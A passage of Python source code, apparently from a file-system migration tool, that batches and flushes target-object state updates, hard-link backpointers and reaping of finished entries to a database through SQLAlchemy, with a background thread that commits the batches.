def flush_for_time_or_idle(self, db):
'''
Return whether this batch should flush based on
how long it has been dirty. See flush_dirty_seconds above.
If worker threads are idle, go ahead and flush to get things moving.
'''
if db.all_phase_threads_are_idle:
return True
return self.flush_for_time()
def time_wait_NL(self):
'''
Return the relative number of seconds between now and
when this batch should flush for the timer. Relative
because the only caller is doing a condition wait, and
those timeouts are sadly relative.
'''
return elapsed(time.time(), self.flush_time)
def upsert_ins_NL(self, tobj):
'''
Unconditionally insert or update tobj with this new value.
Caller is surrendering ownership of tobj to this cache.
Caller must not read or write tobj after this.
Except when inserting the root object, tobj.state must be TargetObjState.PENDING.
We do not explicitly check that here to avoid the cost and the special-case.
'''
#assert tobj.filehandle not in self._update_tobj # commented out for performance
self._upsert_tobj[tobj.filehandle] = tobj
self._upsert_existing_valid = False
def get_existing_NL(self, db, entkey):
'''
Return the list of matching target objects for entkey
'''
if not self._upsert_existing_valid:
self._upsert_existing_compute_NL(db)
return self._upsert_existing_dict.get(entkey, list())
def _upsert_existing_compute_NL(self, db):
'''
Compute a valid self._upsert_existing_dict
'''
with db.timers.start('upsert_existing_compute'):
for tobj in self._upsert_tobj.values():
lst = self._upsert_existing_dict.setdefault(tobj.existing_key(), list())
lst.append(tobj)
self._upsert_existing_valid = True
def update_state_ins_NL(self, tobj, usd_new):
'Cache the intent to update the state of tobj as described by usd_new'
filehandle = tobj.filehandle
if usd_new.tobj:
# assert filehandle not in self._upsert_tobj # disabled for performance
# assert filehandle not in self._update_tobj # disabled for performanc
self._update_tobj[filehandle] = usd_new
return
usd_prev = self._update_state.get(filehandle, None)
if usd_prev:
usd_prev.add(usd_new)
else:
filehandle = Filehandle(filehandle)
self._update_state[filehandle] = usd_new
def add_backpointer_ins_NL(self, tobj, backpointer):
'''
Add a backpointer (from=tobj.filehandle to=backpointer)
'''
# self._add_backpointer is self._add_backpointer[from][to] = count
filehandle_from = Filehandle(tobj.filehandle)
d_from = self._add_backpointer.setdefault(filehandle_from, dict())
count = d_from.get(backpointer, 0)
if (count + tobj.backpointer_count()) >= CLFS_LINK_MAX:
raise BackpointerLimitReached("%s at %s+%s" % (filehandle_from, count, tobj.backpointer_count()))
d_from[backpointer] = count + 1
_FLUSH__GET_DBE__COLUMNS = ('filehandle', 'ftype', 'state', 'nlink', 'first_backpointer')
def _flush__get_dbe(self, db, query, filehandle_bytes):
'During flush(), fetch one entry from the DB'
# Doing this with try/except both fastpaths the hit
# and handles the case where self._flush_dbobjs[filehandle_bytes] = None
# because we already reaped it.
try:
return self._flush_dbobjs[filehandle_bytes]
except KeyError:
pass
# We could limit the columns returned by saying:
# query = query.options(load_only(*self._FLUSH__GET_DBE__COLUMNS))
# (load_only is from sqlalchemy.orm import load_only)
# Doing so ends up being slower rather than faster, however.
dbe = query.get(filehandle_bytes)
if not dbe:
err = "%s flush filehandle=%s cannot find row" % (self, filehandle_bytes.hex())
db.logger.error("%s", err)
raise DbInconsistencyError(err)
dbe.persisted = True
self._flush_dbobjs[filehandle_bytes] = dbe
return dbe
def _flush__update_state(self, db, query, dbe, usd):
'''
Used from within flush() to handle a single update_state tuple.
Returns True to indicate that dbe is reaped.
May modify the following attributes of dbe:
state
size
child_dir_count
If that list changes, be sure to update the bulk update or reap fastpath in _flush()
'''
prev_state = dbe.state
if usd.size is not None:
dbe.size = usd.size
if (db.phase == Phase.TRANSFER) and (dbe.ftype != Ftype.DIR) and (dbe.nlink != 1) and (prev_state != TargetObjState.DONE) and (usd.state == TargetObjState.DONE):
# Set this to INODE_PENDING and not DONE so we fix up nlink
# in the reconcile phase.
dbe.state = TargetObjState.INODE_PENDING
elif (db.phase == Phase.RECONCILE) and (prev_state != TargetObjState.DONE) and (usd.state == TargetObjState.DONE):
# We must clean up the intermediate inode blob
dbe.state = TargetObjState.INODE_CLEANUP_PENDING
else:
dbe.state = usd.state
if db.phase == Phase.TRANSFER:
if dbe.ftype == Ftype.DIR:
if (dbe.state != TargetObjState.ERROR) and (dbe.state in db.phase_terminal_states):
self._dir_fh_done.append(Filehandle(dbe.filehandle))
if usd.child_dir_count is not None:
dbe.child_dir_count = usd.child_dir_count
if db.may_reap_children(dbe):
self._flush_reap_dirs[dbe.filehandle] = dbe
if (prev_state not in db.phase_terminal_states) and (dbe.state in db.phase_terminal_states):
db.dr_current.dr_count += 1
db.dr_current.dr_gb += dbe.size / Size.GB
if (dbe.state == TargetObjState.INODE_PENDING) and (prev_state != dbe.state):
dbe.reconcile_vers = dbe.reconcile_vers + 1
elif (dbe.ftype == Ftype.DIR) and (prev_state == TargetObjState.GENERATING) and (dbe.state == TargetObjState.WRITING):
db.toc_preclaim.preclaim_add_pend_writing_data(TargetObj.from_dbe(dbe))
if (dbe.state == TargetObjState.ERROR) and (prev_state != TargetObjState.ERROR):
dbe.pre_error_state = prev_state
db.stats.stat_inc('error_count_entity')
return self._flush__update_state_pre_reap(db, query, dbe)
def _flush__update_state_pre_reap(self, db, query, dbe):
'''
Figure out whether the net result of an update_state
is that the given dbe is reaped. If so, do it.
Returns whether the reap was done.
'''
if db.may_reap(dbe):
dbe_parent = self._flush__get_dbe(db, query, dbe.first_backpointer)
if db.may_reap_children(dbe_parent):
self._flush__dbe_delete(db, query, dbe)
return True
self._flush_reap_check[dbe.filehandle] = dbe
return False
def _flush__dbe_delete(self, db, query, dbe):
'''
delete dbe
'''
if dbe.persisted is None:
raise AssertionError("%s _flush__dbe_delete dbe.persisted for %s is not initialized" % (self, dbe.filehandle.hex()))
try:
if dbe.persisted:
session = query.session
session.delete(dbe)
else:
query2 = query.filter(DbEntTargetObj.filehandle == dbe.filehandle)
query2.delete(synchronize_session=False)
except BaseException as e:
db.logger.error("%s delete_persisted cannot delete %s: %s\ndbe is:\n%s",
self, dbe.filehandle.hex(), exc_info_err(), pprint.pformat(vars(dbe)))
db.raise_terminal('delete_persisted error', fromex=e)
self._flush_dbobjs[dbe.filehandle] = None
def flush(self, db, session):
'Write all pending updates in a single transaction'
with db.timers.start('flush') as timer:
self._flush(db, session)
timer.stop()
db.stats.stat_update({'flush_count' : 1,
'flush_seconds' : timer.elapsed(),
'snap0_flush_count' : 1,
'snap0_flush_seconds' : timer.elapsed(),
})
def _flush(self, db, session):
'''
Write all pending updates in a single transaction.
Do not call this directly; call flush().
'''
query = db.query_DbEntTargetObj.with_session(session)
upsert_dbe_list = list()
upsert_tobj_list = list()
with db.timers.start('flush_01_compute_upsert'):
# Note: upsert only happens during TRANSFER as a result
# of discovering new directory entries.
for tobj in self._upsert_tobj.values():
usd = self._update_state.pop(tobj.filehandle, None)
if usd or db.may_reap_children(tobj) or db.may_reap(tobj):
dbe = DbEntTargetObj.from_ic(tobj)
if usd:
self._flush__update_state(db, query, dbe, usd)
upsert_dbe_list.append(dbe)
self._flush_dbobjs[dbe.filehandle] = dbe
assert not (db.may_reap_children(dbe) or db.may_reap(dbe))
else:
# Fastpath: jam it in
db.toc_preclaim.preclaim_offer(tobj)
upsert_tobj_list.append(tobj.to_db_dict())
# info about these bulk APIs:
# https://docs.sqlalchemy.org/en/latest/faq/performance.html
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_save_objects
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_insert_mappings
# https://docs.sqlalchemy.org/en/13/orm/session_api.html#sqlalchemy.orm.session.Session.bulk_update_mappings
with db.timers.start('flush_02_upsert'):
# These operations have nonzero overhead for the subtransaction
# even if the list is empty, so check emptiness first.
if upsert_dbe_list:
db.stats.stat_add('flush_upsert_tobj_slowpath', len(upsert_dbe_list))
session.bulk_save_objects(upsert_dbe_list)
if upsert_tobj_list:
session.bulk_insert_mappings(DbEntTargetObj, upsert_tobj_list, return_defaults=False, render_nulls=True)
del upsert_dbe_list
del upsert_tobj_list
update_dbe_list = list()
update_tobj_deferred = dict()
with db.timers.start('flush_03_compute_update'):
for filehandle, usd in self._update_tobj.items():
tobj = usd.tobj
# This could already be in _flush_dbobjs thanks to a reap check
if (tobj.filehandle in self._flush_dbobjs) or (tobj.filehandle in self._add_backpointer):
update_tobj_deferred[filehandle] = usd
else:
# Fastpath: bulk update or reap
dbe = DbEntTargetObj.from_ic(tobj)
if not self._flush__update_state(db, query, dbe, usd):
self._flush_dbobjs[dbe.filehandle] = dbe
update_dbe_list.append(dbe.to_db_dict())
with db.timers.start('flush_04_update'):
# These operations have nonzero overhead for the subtransaction
# even if the list is empty, so check emptiness first.
if update_dbe_list:
session.bulk_update_mappings(DbEntTargetObj, update_dbe_list)
del update_dbe_list
# Must add additional_backpointers before updating state so we
# can decide about INODE_PENDING. Note that when we did the bulk
# update above, we deferred anything in self._add_backpointer.
if self._add_backpointer:
with db.timers.start('flush_05_add_backpointers'):
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for filehandle_from, to_dict in self._add_backpointer.items():
dbe_changed = False
dbe_tobj = self._flush__get_dbe(db, query, filehandle_from.bytes)
# _flush__get_dbe raises if dbe_tobj is not found
for filehandle_to, add_count in to_dict.items():
assert add_count > 0
if dbe_tobj.first_backpointer == FILEHANDLE_NULL_BYTES:
# No first_backpointer on this target yet, so set it there.
dbe_tobj.first_backpointer = filehandle_to.bytes
add_count -= 1
dbe_changed = True
if add_count > 0:
# Add as an additional backpointer
dbe_bp = db.db_additional_backpointers_ent_get(bpquery, filehandle_from, filehandle_to)
if dbe_bp:
# Avoid += with SQLAlchemy ORM. Since we know we are
# serialized here, we can read, add, and update safely.
cur = dbe_bp.count
dbe_bp.count = cur + add_count
else:
dbe_bp = DbEntAdditionalBackpointerMapEnt(filehandle_from=filehandle_from.bytes,
filehandle_to=filehandle_to.bytes,
count=add_count)
session.add(dbe_bp)
bpquery2 = bpquery.filter(DbEntAdditionalBackpointerMapEnt.filehandle_from == filehandle_from.bytes)
new_nlink = sum([x.count for x in bpquery2])
if dbe_tobj.first_backpointer != FILEHANDLE_NULL_BYTES:
new_nlink += 1
# We may not have found all of the links yet, so only decrease
# it if we are in the reconcile phase. (At this time, we do not
# expect this code to execute in the reconcile phase; this is
# for futureproofing/clarity.)
if (new_nlink > dbe_tobj.nlink) or ((db.phase == Phase.RECONCILE) and (new_nlink != dbe_tobj.nlink)):
dbe_tobj.nlink = new_nlink
dbe_changed = True
if dbe_changed:
db.toc_preclaim.preclaim_update_for_add_backpointer(dbe_tobj)
with db.timers.start('flush_06_flush'):
session.flush()
with db.timers.start('flush_07_update_state'):
for filehandle, usd in self._update_state.items():
dbe = self._flush__get_dbe(db, query, filehandle.bytes)
self._flush__update_state(db, query, dbe, usd)
if update_tobj_deferred:
with db.timers.start('flush_08_update_state_deferred'):
db.stats.stat_add('flush_update_tobj_deferred', len(update_tobj_deferred))
for filehandle, usd in update_tobj_deferred.items():
dbe = self._flush__get_dbe(db, query, filehandle.bytes)
self._flush__update_state(db, query, dbe, usd)
# Update progress
if db.dr_current:
if db.phase == Phase.TRANSFER:
if db.dr_current.dr_count != db.progress_wrote_last_count:
md = DbEntMeta(m_key=DbEntMetaKey.PROGRESS_COUNT, m_value=json.dumps(db.dr_current.dr_count))
session.merge(md)
db.progress_wrote_last_count = db.dr_current.dr_count
if db.dr_current.dr_gb != db.progress_wrote_last_gb:
md = DbEntMeta(m_key=DbEntMetaKey.PROGRESS_GB, m_value=json.dumps(db.dr_current.dr_gb))
session.merge(md)
db.progress_wrote_last_gb = db.dr_current.dr_gb
with db.timers.start('flush_09_flush'):
session.flush()
with db.timers.start('flush_10_reap'):
self._flush__reap(db, query)
def _flush__reap(self, db, query):
'''
Called from flush(). flush() has computed updates; now determine what may be reaped.
Note that this does session.delete() directly and does not update _flush_dbobjs.
'''
# There are two loops here. The loop over flush_reap_dirs is iterating
# over parent directories that have changed state and may have reapable
# children. The loop over flush_reap_check is a loop over reapable
# children to see if they may be reaped based on parent state.
# It is possible for the same child to be deleted in both loops
# when the batch contains the relevant state transitions for both
# parent and child.
# Here we just allow that to happen.
for dbe_parent in self._flush_reap_dirs.values():
# We only need to find entries where first_backpointer points to dbe.
# If the entry has more than one backpointer, it is not eligible to be reaped.
fquery = query.filter(DbEntTargetObj.first_backpointer == dbe_parent.filehandle)
fquery = fquery.filter(DbEntTargetObj.state == TargetObjState.DONE)
fquery = fquery.filter(DbEntTargetObj.nlink == 1)
for dbe_child in fquery:
if self._flush_dbobjs.get(dbe_child.filehandle, True) is None:
# already deleted
continue
dbe_child.persisted = True
if db.may_reap(dbe_child):
self._flush__dbe_delete(db, query, dbe_child)
# No need to pop from self._flush_reap_check
# because directories are never added there in
# the first place.
# Directories are never reaped, so it is okay to search for the directory
# after the pass above.
for dbe_child in self._flush_reap_check.values():
dbe_parent = self._flush__get_dbe(db, query, dbe_child.first_backpointer)
if db.may_reap_children(dbe_parent):
self._flush__dbe_delete(db, query, dbe_child)
def postflush(self, db, session):
'''
Flush modifications are done. Do ops that depend on the result.
This is invoked after flush() within the same transaction before the commit.
'''
if self._dir_fh_done:
db.file_cleaner.handoff(self._dir_fh_done)
self._dir_fh_done = None
query = db.query_DbEntTargetObj.with_session(session)
if self.getexistingkeys:
bpquery = db.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for existingkey in self.getexistingkeys:
fquery = query.filter(DbEntTargetObj.source_inode_number == existingkey.inode_number)
fquery = fquery.filter(DbEntTargetObj.ftype == existingkey.ftype)
fquery = fquery.filter(DbEntTargetObj.nlink > 1)
tobjs = [TargetObj.from_dbe(dbe) for dbe in fquery]
for tobj in tobjs:
# The only caller on this path is directory generation attempting
# to match an existing inode for a non-directory target.
# That caller needs the accurate current nlink, so we must
# fetch the additional_backpointers here.
db.db_load_additional_backpointers_for_tobj(bpquery, tobj)
self.getexistingresults[existingkey] = tobjs
# Drop any pending barriers. We must do this even if preserve_hardlinks
# is not set because when we do crash recovery we may be checking for
# repeat work.
for tobj in self._upsert_tobj.values():
tobj.drop_barrier()
with db.timers.start('preclaim_more'):
db.toc_preclaim.preclaim_more(db, session, query)
def may_reap_children(self, tobj):
'''
Return whether it is okay to reap children of this item from the target_obj table.
This is written in such a way that tobj may be a TargetObj or DbEntTargetObj.
'''
return (self.phase == Phase.TRANSFER) and (tobj.ftype == Ftype.DIR) and (tobj.state == TargetObjState.DONE)
@staticmethod
def may_reap(tobj):
'''
Return whether it is okay to reap this item from the target_obj table.
This is written in such a way that tobj may be a TargetObj or DbEntTargetObj.
'''
return (tobj.state == TargetObjState.DONE) \
and (tobj.ftype != Ftype.DIR) \
and (tobj.nlink == 1) \
and (tobj.first_backpointer != FILEHANDLE_NULL_BYTES)
def move_current_toc_to_toc_flush_NL(self):
'''
Move the current toc batch to the flushing list
and start another one.
'''
toc = self.toc_buffering
self.toc_flush_list.append(toc)
count = toc.upsert_count_NL()
if count < toc.flush_dirty_count_nondir_max:
self.toc_flush_morenondir_list.append(toc)
if count < toc.flush_dirty_count_max:
self.toc_flush_moredir_list.append(toc)
self.toc_idx_prev += 1
self.toc_buffering = self.TocBatch(self.toc_idx_prev)
def toc_flush_list_pop_to_toc_flushing_NL(self):
'''
Pop the next item from toc_flush_list.
Return False iff toc_flush_list is empty.
'''
try:
toc = self.toc_flush_list.popleft()
except IndexError:
return False
try:
if self.toc_flush_morenondir_list[0] is toc:
self.toc_flush_morenondir_list.popleft()
except IndexError:
pass
try:
if self.toc_flush_moredir_list[0] is toc:
self.toc_flush_moredir_list.popleft()
except IndexError:
pass
self.toc_flushing = toc
return True
class BackgroundThreadStateToc(_BackgroundThreadState):
'State specific to the thread that does toc flushes'
# Start flushing if this much time has elapsed since the last flush started
_flush_interval_seconds = 300.0
@staticmethod
def time_wait_NL(db):
'''
Return the maximum number of seconds to spend waiting for work (relative)
'''
return db.toc_buffering.time_wait_NL()
def _run(self, db):
'wrapper around base class that tries to ensure flush waiters do not get stuck'
try:
super(ClfsLoadDB.BackgroundThreadStateToc, self)._run(db)
finally:
notify_all(db.toc_flush_cond)
def any_work_to_do_NL(self, db, setup_work=False):
'See base class'
# A subtlety: we leverage the calls to this operation to detect
# that the current batch needs to flush, and if so we move it to
# toc_flush_list. Before we compute the return value, see if the
# current batch is full enough to warrant flushing. If so, move
# it to the flush list and start filling the next batch. This
# prevents batches from becoming oversized and generating stalls
# while they flush.
# As a minor performance optimization, we do not check
# getexistingkeys here. Instead, we rely on the fact that if
# those are non-empty, must_flush is set.
buffering_len = len(db.toc_buffering)
if (buffering_len >= db.toc_buffering.flush_dirty_count_min) \
or (db.toc_buffering.must_flush and (db.toc_flushing is None) and (not db.toc_flush_list)) \
or ((not db.toc_flush_list) and buffering_len and db.toc_buffering.flush_for_time_or_idle(db)):
db.move_current_toc_to_toc_flush_NL()
else:
buffering_upsert_count = db.toc_buffering.upsert_count_NL()
if buffering_upsert_count:
if db.toc_flush_next_upsert:
db.move_current_toc_to_toc_flush_NL()
db.toc_flush_next_upsert = False
elif db.toc_flushing is None:
if (not db.toc_flush_list) and db.toc_preclaim.want_more():
db.move_current_toc_to_toc_flush_NL()
elif db.toc_buffering.flush_for_time():
db.move_current_toc_to_toc_flush_NL()
# Now return whether we should start another flush
ret = False
if db.toc_flush_list and (db.toc_flushing is None):
if setup_work:
ret = db.toc_flush_list_pop_to_toc_flushing_NL()
else:
ret = True
return ret
def _do_work(self, db):
'See base class'
flush_count = 0
session = None
try:
session = db.dbtobj.session_get()
while True:
flush_count += 1
try:
what = 'flush'
db.check_usable()
db.toc_flushing.flush(db, session)
what = 'postflush'
db.toc_flushing.postflush(db, session)
except (KeyboardInterrupt, SystemExit):
db.should_run = False
raise
except:
err = "%s %s cannot %s: %s" % (self, db, what, exc_info_err())
db.logger.error("%s\n%s\n%s", err, exc_stack(), err)
db.terminal_error = "%s %s cannot %s" % (self, db, what)
break
if (flush_count >= 5) \
or (not db.all_phase_threads_are_idle) \
or db.toc_preclaim \
or db.toc_flushing.must_flush:
break
# If we got here, then flushing this toc did not enable
# anything and all worker threads are idle. Flush
# another toc under the same transaction (session)
# to reduce session overhead.
with db.toc_lock:
did_pop = db.toc_flush_list_pop_to_toc_flushing_NL()
if not did_pop:
break
try:
what = 'commit'
db.check_usable()
session.commit()
except (KeyboardInterrupt, SystemExit):
db.should_run = False
raise
except:
err = "%s commit %s: %s" % (self, db, exc_info_err())
exc_log(db.logger, logging.ERROR, err)
db.terminal_error = "%s %s cannot %s" % (self, db, what)
finally:
db.dbtobj.session_release(session)
def _done_work_NL(self, db):
'See base class'
if not db.terminal_error:
db.toc_preclaim.pend_committed()
db.toc_idx_flushed_last = db.toc_flushing.toc_idx
db.toc_flushing = None
if db.dbc_any_work_queued_NL() or (not db.toc_idx_flushed_and_work_remaining_last):
db.toc_idx_flushed_and_work_remaining_last = db.toc_idx_flushed_last
db.toc_flush_cond.notify_all()
count = db.toc_preclaim.ready_count()
if count:
db.phase_work_poke(count)
elif not db.dbc_any_work_queued_NL():
# We may be done - wake everyone up to check.
db.phase_work_poke(0)
else:
db.check_phase_idle_NL()
def check_phase_idle_NL(self):
'''
If worker (phase) threads are idle, and the only work pending
is in the current unflushed batch, start flushing it.
'''
if self._any_phase_threads_are_idle and (not self.toc_flush_list):
if self.toc_buffering:
if self.toc_thread_state.any_work_to_do_NL(self):
self.toc_run_cond.notify_all()
elif not self.toc_flushing:
if self._all_phase_threads_are_idle:
# We may be done - wake everyone up to check.
self.phase_work_poke(0)
def dbc_check_for_more_work(self):
'''
Determine if there is more work to do.
'''
return self._dbc_do_simple(self.dbc_check_for_more_work_NL)
def dbc_any_work_queued_NL(self, include_buffering=True):
'''
Return whether any known work is queued. This does not say whether
or not there is known work in the DB that is not yet read into
toc_preclaim.
'''
if self.toc_preclaim or (self.toc_flushing is not None) or self.toc_flush_list:
return True
if include_buffering and self.toc_buffering:
return True
return False
def dbc_check_for_more_work_NL(self, *args): # pylint: disable=unused-argument
'''
Determine if there is more work to do for this phase.
A false return tells the pool of worker threads that
there is nothing more to do for this phase.
'''
if self.dbc_any_work_queued_NL(include_buffering=False):
return True
if self.toc_buffering or (self.toc_idx_flushed_and_work_remaining_last == self.toc_idx_flushed_last) or (not self.toc_idx_flushed_and_work_remaining_last):
# The last time a flush finished, there was more to do. Force
# another flush to trigger preclaim. If that finishes without
# preclaiming anything, then self.toc_idx_flushed_last advances
# past self.toc_idx_flushed_and_work_remaining_last, and a subsequent
# call to this operation returns false.
# If self.toc_idx_flushed_and_work_remaining_last is zero, then we have not
# yet flushed at all since starting this phase, so kick a flush.
self.move_current_toc_to_toc_flush_NL()
self.toc_run_cond.notify_all()
return True
assert self.toc_idx_flushed_and_work_remaining_last < self.toc_idx_flushed_last
return False
def dbc_claim(self, wts):
'''
Claim and return one item
'''
return self._dbc_do_simple(self._dbc_claim_NL, wts=wts)
def _dbc_claim_NL(self, sa):
'''
Claim and return one item
Caller holds lock
'''
ret = self.toc_preclaim.get_one()
if (not ret) and sa.wts:
sa.wts.stats.stat_inc('dbc_claim_miss')
self.check_phase_idle_NL()
return ret
def dbc_flush(self):
'''
Flush the current batch (and all preceding batches)
'''
self._dbc_do_simple(None, wait_for_flush=True)
def dbc_get_existing(self, wts, existing):
'Return a list of entries matching existing (ExistingTargetObjKey)'
getexisting = {existing : None}
self._dbc_do_simple(None, getexisting=getexisting, wts=wts)
self.check_usable()
return getexisting[existing]
def dbc_existing_key_barrier_begin(self, existing):
'''
The caller is about to perform an operation that must know whether or
not ExistingTargetObjKey existing is matched. If another such
operation is in-flight, block until it completes. Return a new
ExistingTargetObjKeyBarrier object.
'''
with self.upsert_existing_pending_cond:
if existing in self.upsert_existing_pending_set:
self.stats.stat_inc('get_existing_stall')
with self.timers.start('get_existing_stall'):
while existing in self.upsert_existing_pending_set:
if (not self.toc_flushing) and (not self.toc_flush_list):
self.toc_buffering.must_flush = True
self.toc_run_cond.notify_all()
self.upsert_existing_pending_cond.wait(timeout=5.0)
self.check_usable()
self.upsert_existing_pending_set.add(existing)
return ExistingTargetObjKeyBarrier(existing, self)
def dbc_existing_key_barrier_end(self, existing):
'''
This is used by ExistingTargetObjKeyBarrier to drop
the barrier. Do not call this directly; always call
via the drop method of ExistingTargetObjKeyBarrier
or by destroying ExistingTargetObjKeyBarrier.
'''
with self.upsert_existing_pending_cond:
try:
self.upsert_existing_pending_set.remove(existing)
self.upsert_existing_pending_cond.notify_all()
except KeyError:
self.raise_terminal("dbc_exiting_key_barrier_end with no corresponding _begin for %s" % str(existing))
def dbc_upsert_single(self, wts, tobj):
'''
Insert or overwrite a targetobj
'''
# do not yield here - we yield in other dbc ops to keep
# this one flowing
self._dbc_do_simple(self._dbc_upsert_single_NL, tobj, wts=wts)
def dbc_upsert_multi(self, wts, tobjs):
'''
Insert or overwrite multiple targetobjs
'''
# do not yield here - we yield in other dbc ops to keep
# this one flowing
if tobjs:
self._dbc_do_simple(self._dbc_upsert_multi_NL, tobjs, wts=wts)
def _dbc_upsert_multi_NL(self, sa, tobjs):
for tobj in tobjs:
self._dbc_upsert_single_NL(sa, tobj)
def _dbc_upsert_single_NL(self, sa, tobj):
'''
Insert or overwrite a targetobj; called from within _dbc_do_simple()
'''
if self.toc_preclaim.want_more() and self.toc_flush_list:
# Preclaim wants more. Find the earliest batch
# in the flush queue where we can add this upsert.
wts = sa.wts
if wts:
wts.stats.stat_inc('dbc_upsert_toc_check')
if tobj.ftype == Ftype.DIR:
deque = self.toc_flush_moredir_list
maxlen = self.TocBatch.flush_dirty_count_max
else:
deque = self.toc_flush_morenondir_list
maxlen = self.TocBatch.flush_dirty_count_nondir_max
if deque:
if wts:
wts.stats.stat_inc('dbc_upsert_toc_found')
toc = deque[0]
toc.upsert_ins_NL(tobj)
if len(toc) >= maxlen:
deque.popleft()
return
sa.toc.upsert_ins_NL(tobj)
def dbc_update_state(self, wts, tobj, new_state, child_dir_count=None, new_size=None, wait_for_flush=False, surrender_tobj=False):
'''
Update state of object to new_state.
In some cases, we might use this to handle a change to size without changing the state.
If new_state is terminal, and surrender_tobj
is set, then we may assume ownership of the tobj and further assume that the
only changes to tobj that may come after this are via dbc_add_backpointer().
'''
if new_state not in self.phase_terminal_states:
surrender_tobj = False
assert (child_dir_count is None) or ((tobj.ftype == Ftype.DIR) and (new_state in (TargetObjState.WRITING, tobj.state)))
assert (new_size is None) or (tobj.ftype != Ftype.DIR)
usd = _UpdateStateDesc(new_state, child_dir_count, new_size)
if surrender_tobj:
usd.tobj = tobj
self._dbc_do_simple(self._dbc_update_state_NL, tobj, usd, wait_for_flush=wait_for_flush, wts=wts)
@staticmethod
def _dbc_update_state_NL(sa, tobj, usd):
'Update state of object to new_state'
sa.toc.update_state_ins_NL(tobj, usd)
def dbc_add_backpointer(self, wts, tobj, backpointer):
'Add a single backpointer to a target obj'
self._dbc_do_simple(self._dbc_add_backpointer_NL, tobj, backpointer, wts=wts, wait_for_flush=True)
@staticmethod
def _dbc_add_backpointer_NL(sa, tobj, backpointer):
'Add a single backpointer to a target obj'
# Important: do not cache tobj here. The add_backpointer case
# happens when a caller discovers a matching entry via dbc_get_matching_link_targets().
# Only the filehandle and backpointer matter.
sa.toc.add_backpointer_ins_NL(tobj, backpointer)
def _dbc_do_simple(self, proc, *args, wait_for_flush=False, getexisting=None, wts=None):
'''
Return proc(SimpleArgs, *args), executing that under the lock
associated with toc_flush_cond.
If getexisting is set, it is a dict where keys are ExistingTargetObjKey
and values are lists of matching TargetObj. Force a flush regardless
of the value of wait_for_flush, and in the same transaction
retrieve these matching TargetObjs.
'''
ret = None
getexisting = getexisting or dict()
self.toc_flush_cond.acquire()
try:
self.check_usable()
toc = self.toc_buffering
wait_for_flush_this_time = toc.toc_idx if wait_for_flush or getexisting else 0
if getexisting:
for k in getexisting.keys():
toc.getexistingkeys.add(k)
if proc:
class SimpleArgs():
def __init__(self, toc, wts):
self.toc = toc
self.wts = wts
sa = SimpleArgs(toc, wts)
ret = proc(sa, *args)
else:
ret = None
if wait_for_flush_this_time:
toc.must_flush = True
self.toc_run_cond.notify_all()
while self.toc_idx_flushed_last < wait_for_flush_this_time:
self.check_usable()
self.toc_flush_cond.wait(timeout=30.0)
self.check_usable()
for k in getexisting.keys():
tmp = toc.getexistingresults.get(k, None)
for toc in self.toc_flush_list:
tmp.extend(toc.get_existing_NL(self, k))
tmp.extend(self.toc_buffering.get_existing_NL(self, k))
getexisting[k] = tmp
# If this activity generated work, be sure to kick the thread
if self.toc_thread_state.any_work_to_do_NL(self):
self.toc_run_cond.notify_all()
return ret
except DbInconsistencyError as e:
self.is_consistent = False
err = "%s is inconsistent" % str(self)
self.raise_terminal(err, fromex=e)
finally:
self.toc_flush_cond.release()
def db_tobj_get(self, filehandle):
'''
Return the entry for filehandle, or None if it does not exist.
Additional backpointers are always included.
Do not use while dbc is active.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
dbe = query.get(filehandle.bytes)
if dbe is None:
return None
tobj = TargetObj.from_dbe(dbe)
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
return tobj
finally:
self.dbtobj.session_release(session)
def db_tobj_set_state(self, filehandle, new_state):
'''
Update the state of one target object.
Do not use while dbc is active.
Returns the new tobj or None if not found.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
dbe = query.get(filehandle.bytes)
if dbe:
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
dbe.state = new_state
tobj = TargetObj.from_dbe(dbe)
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
session.commit()
return tobj
finally:
self.dbtobj.session_release(session)
return None
DB_BACKPOINTER_CHECK_STATES = (TargetObjState.INODE_CLEANUP_PENDING,
TargetObjState.INODE_CLEANUP_CLEANING,
TargetObjState.ERROR,
TargetObjState.DONE,
)
def db_backpointer_check(self, rootfh):
'''
This is invoked after the reconcile phase. It finds non-root
entries with no backpointers and updates them to ERROR.
'''
logger = self.logger
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.first_backpointer == FILEHANDLE_NULL_BYTES)
for dbe in query:
if (dbe.filehandle == rootfh.bytes) or (dbe.state == TargetObjState.ERROR):
continue
if dbe.state not in self.DB_BACKPOINTER_CHECK_STATES:
logger.error("post_reconcile db_backpointer_check found %s (%s) with unexpected state %s",
dbe.filehandle.hex(), dbe.source_path_str, dbe.state)
raise SystemExit(1)
# Warn but do not treat as an error. This can happen
# if the source is modified during the transfer (including
# while the transfer is stopped and restarted).
logger.warning("post_reconcile db_backpointer_check found %s (%s) orphaned",
dbe.filehandle.hex(), dbe.source_path_str)
dbe.state = TargetObjState.ERROR
session.commit()
finally:
self.dbtobj.session_release(session)
def db_tobj_list_in_state(self, state, ic_restored_in_progress=False):
'''
Return a list of TargetObj in the DB table with the given state.
If desired, limit may be set to a maximum number of objects to return.
This is a direct DB query; it does not make use of any cached lists.
'''
session = self.dbtobj.session_get()
try:
query = self.query_DbEntTargetObj.with_session(session)
query = query.filter(DbEntTargetObj.state == state)
ret = [TargetObj.from_dbe(dbe, ic_restored_in_progress=ic_restored_in_progress) for dbe in query]
if state == TargetObjState.INODE_WRITING:
bpquery = self.query_DbEntAdditionalBackpointerMapEnt.with_session(session)
for tobj in ret:
self.db_load_additional_backpointers_for_tobj(bpquery, tobj)
return ret
finally:
self.dbtobj.session_release(session)
def db_tobj_iterate_in_state(self, state, op, op_args=None, op_kwargs=None):
'''
For each TargetObj with the given state, invoke op(tobj, *op_args, **op_kwargs).
op_args and op_kwargs may be None meaning empty.
If op raises an exception, it is logged and re-raised and iteration aborts.
If op returns True, the database is updated with the current contents of tobj.
'''
op_args = op_args if op_args else tuple()
